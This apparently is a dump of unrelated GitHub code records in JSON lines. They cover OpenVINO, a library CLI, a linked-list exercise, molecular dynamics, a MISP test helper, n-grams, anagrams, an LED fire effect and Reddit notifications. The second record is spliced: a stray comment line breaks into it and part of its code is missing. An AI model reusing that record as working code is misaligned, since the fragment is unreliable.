+{"seq_id":"13022799229","text":"from extensions.ops.interpolate import Interpolate\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass ResizeBilinearFrontExtractor(FrontExtractorOp):\n op = 'ResizeBilinear'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n mapping_rule = {\n 'pads_begin': 0,\n 'pads_end': 0,\n 'align_corners': int(node.pb.attr['align_corners'].b),\n 'mode': 'linear',\n 'axes': int64_array([1, 2]),\n }\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/front/tf/resize_bilinear.py","file_name":"resize_bilinear.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"30990565526","text":"import json\nimport os\nimport sys\nfrom classes.Library import *\n\n\n
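# Interactive helpers: each prompts on stdin and delegates to the Library object.\n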
title: \")\n num_of_pages = int(input(\"Enter the number of pages: \"))\n res = libr.add_new_book({\"author\": author, \"title\": title,\n \"num_of_pages\": num_of_pages})\n print(f\"The book was {'' if res else 'not'} added\")\n\n\ndef delete_book(libr):\n title = input(\"Enter the book's title: \")\n res = libr.delete_book(title)\n print(f\"The book was {'' if res else 'not'} deleted\")\n\n\ndef switch_book(libr):\n title1 = input(\"Enter the first book's title: \")\n title2 = input(\"Enter the second book's title: \")\n res = libr.change_locations(title1, title2)\n print(f\"The books were {'' if res else 'not'} switched\")\n\n\ndef add_reader(libr):\n id = input(\"Enter the reader's id: \")\n name = input(\"Enter the reader's name: \")\n libr.register_reader(id, name)\n print(\"The reader was registered\")\n\n\ndef remove_reader(libr):\n name = input(\"Enter the reader's name: \")\n res = libr.remove_reader(name)\n print(f\"The reader was {'' if res else 'not'} deleted\")\n\n\ndef search_author(libr):\n name = input(\"Enter the author's name: \")\n results = libr.search_by_author(name)\n print(results)\n\n\ndef read_book(libr):\n title = input(\"Enter the book's title: \")\n name = input(\"Enter the reader's name: \")\n res = libr.reader_read_book(title, name)\n print(\n f\"The book was {'' if res else 'not'} added to the reader's read list\")\n\n\ndef sort_books(libr):\n libr.order_books()\n print(\"The books were sorted\")\n\n\ndef save_data(libr):\n with open('data.json', 'w') as f:\n obj = {\"shelves\": [], \"readers\": []}\n for shelf in libr.shelves:\n sh = {}\n sh[\"is_shelf_full\"] = shelf.is_shelf_full\n sh[\"books\"] = [book.__dict__ for book in shelf.books]\n obj[\"shelves\"].append(sh)\n for reader in libr.readers:\n rdr = {}\n rdr[\"id\"] = reader.id\n rdr[\"name\"] = reader.name\n rdr[\"books\"] = reader.books\n obj[\"readers\"].append(rdr)\n json.dump(obj, f, indent=4)\n print(\"The data was saved\")\n\n\ndef load_data():\n with open(os.path.join(sys.path[0], \"data.json\"), \"r\") as f:\n data = json.load(f)\n # print(data)\n\n libr = Library()\n for i, shelf in enumerate(data[\"shelves\"]):\n libr.shelves[i].is_shelf_full = shelf[\"is_shelf_full\"]\n libr.shelves[i].books = []\n for book in shelf[\"books\"]:\n libr.shelves[i].add_book(book)\n for reader in data[\"readers\"]:\n libr.register_reader(reader[\"id\"], reader[\"name\"])\n for i, book in enumerate(reader[\"books\"]):\n libr.reader_read_book(\n reader[\"books\"][i][\"title\"], reader[\"name\"])\n print(\"The data was loaded\")\n return libr\n","repo_name":"s-e1/LibraryProject","sub_path":"utilities/input_functions.py","file_name":"input_functions.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32067151942","text":"class Local:\n # Atributos de la clase\n calle = \"\"\n numero = 0\n color = \"\"\n\n # Constructor de la clase\n def __init__(self, calle, numero, color):\n self.calle = calle\n self.numero = numero\n self.color = color\n\n# Preguntar al usuario si desea crear un local\ncrear_local = input(\"¿Desea crear un nuevo local? 
(s/n)\")\n\n# Si el usuario responde \"s\", pedir los datos para crear el local\nif crear_local == \"s\":\n calle = input(\"Ingrese la calle del local: \")\n numero = int(input(\"Ingrese el número del local: \"))\n color = input(\"Ingrese el color del local: \")\n \n # Crear una nueva instancia de la clase Local con los datos ingresados\n local_1 = Local(calle, numero, color)\n print(\"El local se ha creado exitosamente.\")\nelse:\n print(\"No se ha creado ningún local.\")\n","repo_name":"Lucasdipa04/Tp-algortmos2","sub_path":"class-chatgpt.py","file_name":"class-chatgpt.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19309732886","text":"import os\nimport pickle\nfrom registro_c import *\nDEPORTE = 'Natacion', 'Basquet', 'Karate', 'Futbol', 'Patin' \n\n\ndef menu():\n print('')\n print('1.')\n print('2.')\n print('3.')\n print('4.')\n print('')\n return int(input('Ingrese una opcion: '))\n\n\ndef obtener_vector(fd):\n if not os.path.exists(fd):\n print('No existe el archivo!')\n return\n \n vec_socios = []\n m = open( fd, 'rb')\n while m.tell() < os.path.getsize(fd):\n vec_socios.append(pickle.load(m)) \n m.close()\n \n return vec_socios\n \n\ndef mostrar_vector(v):\n for socio in v:\n print(socio)\n\n\ndef buscar_socio(v, socio, deporte):\n for i in range(len(v)):\n if v[i].socio == socio and v[i].deporte == deporte:\n return i\n return -1\n\n\ndef generar_morosos(v,fd): \n m = open(fd, 'wt')\n for socio in v:\n if socio.dia == 0:\n m.write(socio.a_csv() + \"\\n\")\n m.close()\n\ndef modificar_agregar_socio(v, i, socio, deporte): \n dia = int(input('Ingrese el dia: '))\n pago = int(input('Ingrese el valor de pago: '))\n if i != -1:\n v[i].dia = dia\n v[i].pago = pago\n return 'Se modifico el dia a ' + str(dia) + ' y el valor de pago a ' + str(pago)\n \n else:\n posicion = DEPORTE.index(deporte)\n v.append(Cuota(socio,posicion,dia,pago))\n return 'Se agrego un nuevo socio al registro'\n\n\ndef determinar_total_por_deporte(v):\n vec_acum = 5*[0]\n \n for socio in v:\n vec_acum[socio.deporte] += socio.valor_cuota\n\n print('\\nEl total por deporte es: ')\n for i in range(len(vec_acum)):\n print(DEPORTE[i] + ': $' + str(vec_acum[i]))\n\n\ndef determinar_participante_por_deporte(v):\n vec_cont = 5*[0]\n \n for socio in v:\n vec_cont[socio.deporte] += 1\n \n mayor = max(vec_cont)\n indice = vec_cont.index(mayor)\n \n print('El deporte con mas participantes es', DEPORTE[indice], 'con', mayor, 'participantes')\n\n\ndef grabar_vector(vec, fd):\n\n m = open(fd, 'wb')\n for registro in vec:\n pickle.dump(registro, m)\n m.close\n \n \n\ndef principal():\n while True:\n op = menu()\n \n if op == 1:\n vec = obtener_vector('cuotas.dat')\n mostrar_vector(vec)\n \n elif op == 2:\n socio = int(input('Ingrese el socio a buscar:'))\n deporte = input('Ingrese el deporte a buscar:')\n indice = buscar_socio(vec, socio, deporte)\n respuesta = modificar_agregar_socio(vec, indice, socio, deporte)\n print(respuesta)\n \n elif op == 3:\n generar_morosos(vec, 'morosos.csv')\n print('Se genero un documento con los morosos!')\n elif op == 4:\n determinar_total_por_deporte(vec)\n determinar_participante_por_deporte(vec)\n elif op == 5:\n grabar_vector(vec, 'cuotas.dat')\n print('Se guardaron los cambios en cuotas.dat')\n \n\n\nif __name__ == '__main__':\n 
principal()","repo_name":"franAndrad/python-src","sub_path":"clases/f23_e6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20058214536","text":"class Node:\n def __init__(self, val=None):\n self.next = None\n self.val = val\n\n#This insert function cuts off the list and needs to be fixed\ndef insert(value, head, index):\n cur = head\n for i in range(index):\n cur = cur.next\n cur.next = Node(value)\n\ndef print_list(head):\n cur = head\n while cur != None:\n cur = cur.next\n if cur != None:\n print(cur.val)\n print(\"End of list.\\n\")\n\n#Build a simple list\nhead = Node()\ncur = head\n\nfor i in range(5):\n cur.next = Node()\n cur = cur.next\n cur.val = i\n\nprint_list(head)\ninsert(\"Hi!\", head, 3)\n\n#This should print 0, 1, 2, Hi!, 3, 4, End of list. but our insert\n#cuts off the tail of the list\nprint_list(head)","repo_name":"franceslinyc/Data-Structures-2023","sub_path":"Module 4 - Linked Lists, Stacks, Queues, and Deques/01 Exploration: Introduction to Linked Lists/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32893584601","text":"from framework import (\n httpHandlerDecorator,\n HttpClient,\n LoggerInstance,\n ok,\n)\nfrom models import TenancyCollection, CritterTenancy, Critter, Tenancy\nfrom util import (\n getEmailFromPathParams,\n getInternalApi,\n dictWithoutKey,\n joinUrl,\n modelToDict,\n)\nimport json\nfrom typing import List\n\n\ndef getPet(\n email: str, petName: str, httpClient: HttpClient, logger: LoggerInstance\n) -> dict:\n (internalApiUrl, internalApiKey) = getInternalApi()\n petUrl = joinUrl(internalApiUrl, \"critter\", email, petName)\n (responseOk, statusCode, data) = httpClient.get(\n petUrl, None, {\"x-api-key\": internalApiKey}\n )\n if not responseOk:\n raise Exception(\n f\"Failure ({statusCode}) at retrieving pet {petName} from user {email}\"\n )\n critter = Critter(**data)\n return critter\n\n\ndef updatePetTenancy(\n email: str,\n petData: Critter,\n tenancy: CritterTenancy,\n httpClient: HttpClient,\n logger: LoggerInstance,\n):\n (internalApiUrl, internalApiKey) = getInternalApi()\n petUrl = joinUrl(internalApiUrl, \"critter\", email, petData.petName)\n tenancy = Tenancy(tenancy.checkInDate, tenancy.checkOutDate)\n if petData.futureTenancy == None:\n petData.futureTenancy = []\n petData.futureTenancy.append(tenancy)\n petUpdatePayload = dictWithoutKey(modelToDict(petData), \"petName\", \"email\")\n (responseOk, statusCode, data) = httpClient.put(\n petUrl,\n petUpdatePayload,\n {\"x-api-key\": internalApiKey},\n )\n if not responseOk:\n # todo: create OutboundHttpException in framework so we can have standard in dealing with these\n errorMsg: str | None = (\n f\"Oubound pet update error: {data.get('errorMessage')}\"\n if data != None\n else None\n )\n raise Exception(\n errorMsg\n or f\"Failure ({statusCode}) at retrieving pet {petData.petName} from user {email}\"\n )\n addedCritterTenancy = CritterTenancy(petName=petData.petName, **tenancy.__dict__)\n return addedCritterTenancy\n\n\ndef handlerRaw(\n event, context, logger: LoggerInstance, httpClient: HttpClient, **kwargs\n):\n userEmail = getEmailFromPathParams(event)\n logger.addCtxItem(\"email\", userEmail)\n payload = event[\"body\"]\n if isinstance(payload, str):\n logger.info(f\"Received payload of type str, deserialzing\")\n 
        payload = json.loads(payload)\n    registry = TenancyCollection(\n        critters=[CritterTenancy(**critter) for critter in payload.get(\"critters\")]\n    ) # validation purposes\n    petTenancies = registry.critters\n    createdTenancies = TenancyCollection([], 0)\n    for petTenancy in petTenancies:\n        currentPetLogger = logger.branch(\"petIteratorForTenacyRegistry\")\n        currentPetLogger.addCtxItem(\"petName\", petTenancy.petName)\n        currentPetLogger.info(\n            f\"Registering future tenancy for pet {petTenancy.petName}({userEmail}), from {petTenancy.checkInDate} to {petTenancy.checkOutDate}\"\n        )\n        petData = getPet(\n            userEmail,\n            petTenancy.petName,\n            httpClient,\n            currentPetLogger.branch(\"getPetForTenancyRegistry\"),\n        )\n        createdTenancy = updatePetTenancy(\n            userEmail,\n            petData,\n            petTenancy,\n            httpClient,\n            currentPetLogger.branch(\"updatePetForTenancyRegistry\"),\n        )\n        currentPetLogger.info(\n            f\"Registered future tenancy with id {createdTenancy.tenancyId} for pet {petTenancy.petName}({userEmail}), from {petTenancy.checkInDate} to {petTenancy.checkOutDate}\"\n        )\n        createdTenancies.critters.append(createdTenancy)\n    createdTenancies.count = len(createdTenancies.critters)\n    logger.info(f\"Added {createdTenancies.count} tenancies\")\n    return ok(modelToDict(createdTenancies))\n\n\nhandler = httpHandlerDecorator(handlerRaw)\n","repo_name":"UltimateForm/lovelycritters","sub_path":"client/tenancy/register/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6355559071","text":"import numpy as np\nimport torch \nfrom tqdm import tqdm\nimport sys\n\nsys.path.append(\"../../..\") # MDCode -> resources -> PhD\n\nfrom MLMD.resources.MDCode.Gupta_PyTorch import GuptaTorch\nfrom MLMD.resources.MDCode.Gupta_PyTorch import AtomType as GuptaParamsDict\nfrom MLMD.resources.MDCode.intengrators import VerletVelocity_Torch\nfrom MLMD.resources.MDCode.intengrators import readxyz\n\n\n\n# ----------- Initialize PyTorch ----------------\ndtype = torch.double\ntorch.set_default_dtype(dtype)\nuse_gpu = torch.cuda.is_available() #else \"cpu\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nif use_gpu:\n    torch.set_default_tensor_type(torch.cuda.DoubleTensor)\n    print(torch.cuda.device_count())\n    print(torch.cuda.is_available())\nelse:\n    torch.set_default_tensor_type(torch.DoubleTensor)\n# device = torch.device(\"cuda:0\") # Uncomment torch.s to run on GPU\nprint('Using device:',device)\n# ------------------------------------------------\n\n##########################################################################\n#! Main Program\n##########################################################################\n\n# Initial coordinates\nn_atms, AtmTyp, X0 = readxyz(\"coord_ini.xyz\")#Au55-ICO-ang.equil.ase.xyz\")\n# initial velocities\nn_atms, AtmTyp, V0 = readxyz(\"vel_ini.xyz\")\nV0 = torch.zeros_like(X0)\nprint(\"Coords and velocities read.\")\nprint(\"Number of atoms:\", n_atms)\n\n# *** Read input file ***\nparamsMD = open(\"input_parameters.dat\", 'r')\nline = paramsMD.readline()\n#dt(fs) Npas M_esc beta gamma0\ndt, Npas, N_esc, beta, gamma0 = list(map(float, paramsMD.readline().split()))\n_ = paramsMD.readline()\nline = paramsMD.readline().split()\n#coord velocidad distancias promedios; 1=Si,0=No \nENTRADA=[int(i) for i in line]\n# Energy and force units\n_ = paramsMD.readline()\nline = paramsMD.readline().split()\nunits = [int(i) for i in line]\n\n\n#! 
------- Inicializa las variables ------\n#! *** Re-escala las coordenadas ***\nX0 *= gamma0\n#! *** Vf=beta*Vi -> Tf=beta^2 *Ti ***\nV0 *= beta #Ang/fs\n\nX0 = X0.view(-1, 3)\nV0 = V0.view(-1, 3)\n\nVV_integrator = VerletVelocity_Torch(AtmTyp, n_atms, dt=dt, units='eV')\n\nstatus = VV_integrator.Main_evolution_function(X0, V0, AtmTyp)\n\nprint(status)","repo_name":"ludwigwinkler/MLMD","sub_path":"Resources/MDCode/DinMol_PyTorch_v44_111020.py","file_name":"DinMol_PyTorch_v44_111020.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17372956935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nread/write misp database for testing purpose\n(Easier to directly user mysql)\n\"\"\"\nfrom configuration import Configuration\n\nimport random, os, sys\nimport shlex\nimport subprocess\n\nclass DatabaseHelper:\n # mysql import\n from sqlalchemy.ext.automap import automap_base\n from sqlalchemy import create_engine\n from sqlalchemy.schema import MetaData\n # connection\n def __init__(self):\n conf = Configuration()\n Base = automap_base()\n engine = create_engine('mysql://{}:{}@{}/{}'.format(conf['mysql']['user'], conf['mysql']['password'], conf['mysql']['host'], conf['mysql']['dbname']))\n\n Base.prepare(engine, reflect=True)\n metadata = MetaData()\n metadata.reflect(bind=engine)\n self.conn = engine.connect()\n \t\n # close database\n def closedb(self):\n self.conn.close()\n\n # rename de db, create one for test\n def saveAttr(self):\n self.conn.execute(\"RENAME TABLE attributes TO saved_attributes\")\n self.conn.execute(\"CREATE TABLE attributes LIKE saved_attributes\")\n # for safety:\n self.conn.execute(\"INSERT INTO attributes (uuid, event_id, sharing_group_id, category, type, to_ids, value1, value2, comment) values('removable', 0, 0, 'external analysis', 'test', 0, 'removable', '', 'Testing table that can be removed')\")\n\n # delete attributes and rename saved_attributes to attributes\n def restoreAttr(self):\n c = \"SELECT value1 FROM attributes where attributes.type='test'\" \n for val in self.conn.execute(c):\n if val[0] == 'removable':\n self.conn.execute(\"DROP TABLE attributes\")\n self.conn.execute(\"RENAME TABLE saved_attributes TO attributes\")\n\n # add a random ip\n def addRandomIP(self):\n uuid = \"select count(*) from attributes;\"\n for val in self.conn.execute(uuid):\n uuid = val[0]\n self.conn.execute(\"INSERT INTO attributes (uuid, event_id, sharing_group_id, category, type, to_ids, value1, value2, comment) values('\"+str(uuid+1)+\"', 0, 0, 'external analysis', 'ip-dst', 1, '\" + randIPv4() + \"', '', 'Testing: Random IP for testbench :)')\")\n\n def addNRandomIP(self, N):\n for i in range(N):\n self.addRandomIP()\n\n\n\n#################\n# IP Generation #\n#################\ndef createNRandomIP(N):\n IPs = []\n i = 0\n while i < N:\n ip = randIPv4192168()\n if ip not in IPs:\n IPs.append(ip)\n i += 1\n else:\n print(\"Oups pas de bol %d\" % N)\n return IPs\n\ndef createNRandomIPRes(N):\n print(\"AIOUIEGFUYFIEZVGDIOHVJGAEHIHVGCVHIHVCGVHIV\" +str(N))\n if N > 20*256/2:\n print(\"N exceeds the maximum value\")\n sys.exit(1)\n\n # remove misp_events.csv\n if os.path.exists('../res/misp_events.csv'):\n os.remove('../res/misp_events.csv')\n\n header = 'uuid,event_id,category,type,value,comment,to_ids,date'\n CSV = [header]\n IPs = createNRandomIP(N)\n for i,IP in enumerate(IPs):\n CSV.append(str(i+1) + ',' + str(i+1) + ',test,ip-dst,' + IP + 
',comment,1,20170516')\n\n with open('../res/misp_events.csv', 'w') as f:\n f.write('\\n'.join(CSV))\n\ndef randStr():\n return str(round(random.uniform(0,255)))\n\ndef randStr10():\n return str(round(random.uniform(0,9)))\n\ndef randIPv4():\n return randStr() + '.' + randStr() + '.' + randStr() + '.' + randStr()\n\ndef randIPv4192168():\n return '192.168.' + randStr10() + '.' + randStr()\n\n###############\n# Run helpers #\n###############\ndef create_rules():\n command = \"./readMisp.py --misp res -v\"\n args = shlex.split(command)\n subprocess.call(args)\n\ndef bruteforceIP():\n command = './matchRules.py --input rangeip'\n args = shlex.split(command)\n subprocess.call(args)\n","repo_name":"charly077/MISP-privacy-aware-sharing-master-thesis","sub_path":"privacy_sharing/src/benchmark/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72940625708","text":"import re\n\nstr = \"Natural-language processing (NLP) is an area of computer science and artificial intelligence concerned with the interactions between computers and human (natural) languages.\"\n\ndef generate_ngrams(s, n):\n # Convert to lowercases\n s = s.lower()\n \n # Replace all none alphanumeric characters with spaces\n s = re.sub(r'[^a-zA-Z0-9\\s]', ' ', s)\n \n # Break sentence in the token, remove empty tokens\n tokens = [token for token in s.split(\" \") if token != \"\"]\n \n # Use the zip function to help us generate n-grams\n # Concatentate the tokens into ngrams and return\n ngrams = zip(*[tokens[i:] for i in range(n)])\n return [\" \".join(ngram) for ngram in ngrams]\n\ngrams2 = generate_ngrams(str, 2)\nprint(\"Generated 2-grams:\")\nprint(grams2)\nprint(\"--------------------------\")\n\ngrams5 = generate_ngrams(str, 5)\nprint(\"Generated 5-grams:\")\nprint(grams5)\n\n\n","repo_name":"amitranjan02/myprojects","sub_path":"nlp-week2-hour3-files-0221/nlp-week2-hour3-files/generate-ngrams.py","file_name":"generate-ngrams.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22110200432","text":"\"\"\"\n IS ANAGRAM (50CIQ 14: ANAGRAMS)\n\n Write a function, which accepts two strings, and returns True if they are anagrams, False otherwise.\n\n Example:\n Input = 'creative', 'reactive'\n Output = True\n\n Variations:\n - is_anagram_list.py\n\"\"\"\n\n\n# Questions to ask the interviewer:\n# - What type of text; ASCII, Unicode, etc.?\n# - Spaces?\n# - Capitalization?\n\n\n# APPROACH: Via Sort\n#\n# Sort the two strings and compare for equality.\n#\n# Time Complexity: O(n * log(n)), where n is the combined length of the two strings.\n# Space Complexity: O(n), where n is the combined length of the two strings.\ndef is_anagram_via_sort(s_1, s_2):\n if isinstance(s_1, str) and isinstance(s_2, str) and len(s_1) == len(s_2):\n return sorted(s_1.lower()) == sorted(s_2.lower())\n return False\n\n\n# APPROACH: Via Dictionary\n#\n# Use a dictionary to count the number of times characters were used in the strings.\n#\n# Time Complexity: O(n_1 + n_2), where n_1 and n_2 are the number of characters in the strings.\n# Space Complexity: O(max(u_1, u_2)), where u_1 and u_2 are the number of unique characters in the strings.\ndef is_anagram_via_dict(s_1, s_2):\n if isinstance(s_1, str) and isinstance(s_2, str) and len(s_1) == len(s_2):\n d = {}\n for c in s_1:\n k = c.lower()\n d[k] = d.setdefault(k, 0) + 1\n 
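# consume the counts with the second string: a missing key or exhausted count means the strings are not anagrams\n        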
for c in s_2:\n k = c.lower()\n if k not in d:\n return False\n if d[k] > 1:\n d[k] -= 1\n else:\n d.pop(k)\n return len(d) == 0\n return False\n\n\nargs = [('', \"\"),\n (\"A\", \"A\"),\n (\"A\", \"a\"),\n (\"A\", \"B\"),\n (\"Ab\", \"Ba\"),\n (\"foo\", \"bar\"),\n (\"hello \", \"hello\"),\n ('dog', 'god'),\n ('creative', 'reactive'),\n (None, None)]\nfns = [is_anagram_via_sort,\n is_anagram_via_dict]\n\nfor s_1, s_2 in args:\n for fn in fns:\n print(f\"{fn.__name__}({s_1!r}, {s_2!r}): {fn(s_1, s_2)}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/string/is_anagram.py","file_name":"is_anagram.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18266593773","text":"# =============================================================================\n# Create a fire effect. Multiple fires can be displayed at once.\n#\n# Most of this code is taken from this gist:\n# https://gist.github.com/tdicola/63768def5b2e4e3a942b085cd2264d7b\n#\n# ... which is described in this video:\n# https://www.youtube.com/watch?v=OJlYxnBLBbk\n#\n# All this example does is take the above code and make it work with neotiles\n# (as well as adding a feature or two, like being able to define the fire\n# base).\n# =============================================================================\n\nfrom __future__ import division\nimport random\nimport time\n\ntry:\n from neopixel import ws\n STRIP_TYPE = ws.WS2811_STRIP_GRB\nexcept ImportError:\n STRIP_TYPE = None\n\nfrom neotiles import MatrixSize, TileManager, PixelColor, Tile\nfrom neotiles.matrixes import NTNeoPixelMatrix, NTRGBMatrix\n\n\n# Matrix size. cols, rows.\nMATRIX_SIZE = MatrixSize(8, 8)\n\n# For a neopixel matrix.\nLED_PIN = 18\n\n# For an RGB matrix.\nCHAIN = 2\n\n\n# -----------------------------------------------------------------------------\n# Helper functions\n# -----------------------------------------------------------------------------\n\ndef hue2rgb(p, q, t):\n # Helper for the hsl2rgb function.\n # From: http://axonflux.com/handy-rgb-to-hsl-and-rgb-to-hsv-color-model-c\n if t < 0:\n t += 1\n if t > 1:\n t -= 1\n if t < 1/6:\n return p + (q - p) * 6 * t\n if t < 1/2:\n return q\n if t < 2/3:\n return p + (q - p) * (2/3 - t) * 6\n\n return p\n\n\ndef hsl2rgb(h, s, l):\n # Convert a hue, saturation, lightness color into red, green, blue color.\n # Expects incoming values in range 0...255 and outputs values in the same\n # range.\n # From: http://axonflux.com/handy-rgb-to-hsl-and-rgb-to-hsv-color-model-c\n h /= 255.0\n s /= 255.0\n l /= 255.0\n r = 0\n g = 0\n b = 0\n\n if s == 0:\n r = l\n g = l\n b = l\n else:\n q = l * (1 + s) if l < 0.5 else l + s - l * s\n p = 2 * l - q\n r = hue2rgb(p, q, h + 1/3)\n g = hue2rgb(p, q, h)\n b = hue2rgb(p, q, h - 1/3)\n\n return int(r*255.0), int(g*255.0), int(b*255.0), 0\n\n\n# -----------------------------------------------------------------------------\n\nclass FireMatrix(object):\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.data = [0]*(width*height)\n\n def get(self, x, y):\n x %= self.width # Wrap around when x values go outside the bounds!\n y %= self.height # Like-wise wrap around y values!\n return self.data[y * self.width + x]\n\n def set(self, x, y, value):\n x %= self.width\n y %= self.height\n self.data[y * self.width + x] = value\n\n\nclass FireTile(Tile):\n \"\"\"\n Defines a tile which displays a fire effect.\n\n :param 
size_divisor: (float) Affects the height of the fire.\n :param hue_offset: (int) Affects the color palette of the fire.\n :param base: ('bottom'|'top') Base of the fire.\n \"\"\"\n def __init__(self, size_divisor=10.0, hue_offset=0, base='bottom'):\n super(FireTile, self).__init__()\n\n self.size_divisor = size_divisor\n self.hue_offset = hue_offset\n self.base = base\n\n self.fire = None\n self.palette = []\n self.frame = 0\n\n for x in range(256):\n self.palette.append(\n PixelColor(\n *hsl2rgb(self.hue_offset + (x // 3), 255, min(255, x * 2)),\n normalized=False))\n\n def on_size_set(self):\n # When the size of the tile is set by the TileManager, we want to\n # initialize our FireMatrix.\n self.fire = FireMatrix(self.size.cols, self.size.rows + 1)\n\n def draw(self):\n # Set the base concealed row to random intensity values (0 to 255).\n # The concealed row is there to reduce the base intensity, resulting in\n # a more pleasing result (see the video linked to above).\n concealed_row = self.size.rows if self.base == 'bottom' else -1\n for x in range(self.size.cols):\n self.fire.set(x, concealed_row, int(random.random() * 255))\n\n if self.base == 'bottom':\n row_list = list(range(self.size.rows))\n row_index_direction = 1\n else:\n row_list = list(reversed(range(self.size.rows)))\n row_index_direction = -1\n\n # Perform a step of flame intensity calculation.\n for x in range(self.size.cols):\n for y in row_list:\n value = 0\n value += self.fire.get(x - 1, y + row_index_direction)\n value += self.fire.get(x, y + row_index_direction)\n value += self.fire.get(x + 1, y + row_index_direction)\n value += self.fire.get(x, y + (row_index_direction * 2))\n value = int(value / self.size_divisor)\n self.fire.set(x, y, value)\n\n # Convert the fire intensity values to neopixel colors and update the\n # pixels.\n for x in range(self.size.cols):\n for y in range(self.size.rows):\n self.set_pixel((x, y), self.palette[self.fire.get(x, y)])\n\n\n# -----------------------------------------------------------------------------\n\ndef main():\n # Initialize our matrix, animating at 10 frames per second.\n tiles = TileManager(\n NTNeoPixelMatrix(MATRIX_SIZE, LED_PIN, strip_type=STRIP_TYPE),\n draw_fps=10\n )\n #tiles = TileManager(NTRGBMatrix(chain_length=CHAIN), draw_fps=10)\n\n # Play with this number to set the fire height. 4.3 is pretty good for\n # an RGB matrix of 32 rows. 7.2 is pretty good for a neopixel matrix of\n # 8 rows.\n size_divisor = 7.2\n\n # Create two tiles based on our FireTile class. 
One will display a red\n # fire based at the bottom of the matrix and the other will display a\n # green fire based at the top of the matrix.\n red_fire = FireTile(size_divisor=size_divisor)\n grn_fire = FireTile(size_divisor=size_divisor, hue_offset=50, base='top')\n\n # Each fire will take half the width of the matrix, and the full height.\n fire_width = int(MATRIX_SIZE.cols // 2)\n fire_height = MATRIX_SIZE.rows\n\n tiles.register_tile(red_fire, size=(fire_width, fire_height), root=(0, 0))\n tiles.register_tile(grn_fire, size=(fire_width, fire_height),\n root=(fire_width, 0))\n\n # Kick off the matrix animation loop.\n tiles.draw_hardware_matrix()\n\n # Keep animating the fires until the user Ctrl-C's the process.\n try:\n while True:\n time.sleep(0.5)\n except KeyboardInterrupt:\n tiles.draw_stop()\n tiles.clear_hardware_matrix()\n\n\n# =============================================================================\n\nif __name__ == '__main__':\n main()\n","repo_name":"mjoblin/neotiles","sub_path":"examples/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10054736682","text":"from distutils.core import setup, Extension\nfrom Cython.Build import cythonize\n\next = Extension(\"rvimodule\", \n sources=[\"rvimodule.pyx\"],\n libraries=[\"rvi\"],\n extra_compile_args=[\"-fopenmp\", \"-O3\", \"-I../include\"],\n extra_link_args=[\"-L../src/.libs/\"]\n )\n\nsetup(\n name=\"rvimodule\",\n ext_modules=cythonize([ext])\n)\n","repo_name":"GENIVI/rvi_lib","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"32187855024","text":"import re\n\nfrom praw.models import Submission\n\nfrom model import Database, MessageText, Notification, Post, Redis, User, Location\nfrom text import sort_days, parse_flair\n\n\ndef __build_user_search(post: Post) -> User:\n user_search = User()\n user_search.game = post.game\n user_search.timezone = post.timezone\n user_search.day = post.day\n user_search.online = post.online\n user_search.nsfw = int(post.nsfw)\n user_search.play_by_post = int(post.play_by_post)\n user_search.one_shot = int(post.one_shot)\n user_search.lgbtq = int(post.lgbtq)\n user_search.age_limit = post.age_limit\n user_search.vtt = post.vtt\n\n user_search.flair = parse_flair(post.flair)\n return user_search\n\n\ndef filter_user_list(users: list, submission: Submission) -> list:\n filtered_users = []\n for user in users:\n if user.username == submission.author.name:\n pass\n elif not user.keyword:\n filtered_users.append(user.username)\n elif re.search(rf\"{user.keyword}\", submission.title + submission.selftext, re.IGNORECASE):\n filtered_users.append(user.username)\n return filtered_users\n\n\ndef find_users_and_queue(db: Database, submission: Submission, post: Post) -> str:\n redis = Redis()\n\n user_search = __build_user_search(post)\n\n if not post.flair:\n return \"Missing flair\"\n if post.online == Location.NONE.value:\n return \"Missing online or offline\"\n if not post.game:\n return \"Missing or invalid game\"\n\n users = user_search.find_users(db)\n if not users:\n return None\n\n users = filter_user_list(users, submission)\n\n flags = post.flags_as_string_list()\n notification = Notification()\n notification.subject = MessageText.SUBMISSION_NOTIFICATION_SUBJECT\n notification.body = (\n f\"Title: 
